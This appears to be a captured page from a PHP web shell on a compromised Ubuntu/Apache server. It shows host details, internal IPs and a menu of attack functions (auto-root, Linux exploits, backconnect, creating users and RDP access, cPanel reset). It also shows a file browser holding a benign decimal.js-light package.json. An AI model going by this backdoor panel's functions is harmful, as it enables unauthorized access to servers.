Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
decimal.js-light /
[ HOME SHELL ]
Name
Size
Permission
Action
doc
[ DIR ]
drwxr-xr-x
CHANGELOG.md
1.7
KB
-rw-r--r--
LICENCE.md
1.08
KB
-rw-r--r--
README.md
3.5
KB
-rw-r--r--
decimal.d.ts
17.41
KB
-rw-r--r--
decimal.js
52.12
KB
-rw-r--r--
decimal.min.js
12.78
KB
-rw-r--r--
decimal.mjs
48.45
KB
-rw-r--r--
package.json
924
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "decimal.js-light", "description": "An arbitrary-precision Decimal type for JavaScript.", "version": "2.5.1", "keywords": [ "arbitrary", "precision", "arithmetic", "big", "number", "decimal", "float", "biginteger", "bigdecimal", "bignumber", "bigint", "bignum" ], "repository" : { "type": "git", "url": "https://github.com/MikeMcl/decimal.js-light.git" }, "main": "decimal", "module": "decimal.mjs", "browser": "decimal.js", "types": "decimal.d.ts", "author": { "name": "Michael Mclaughlin", "email": "M8ch88l@gmail.com" }, "license": "MIT", "scripts": { "test": "node ./test/test.js", "build": "uglifyjs decimal.js --source-map doc/decimal.js.map -c -m -o decimal.min.js --preamble \"/* decimal.js-light v2.5.1 https://github.com/MikeMcl/decimal.js-light/LICENCE */\"" } }
Close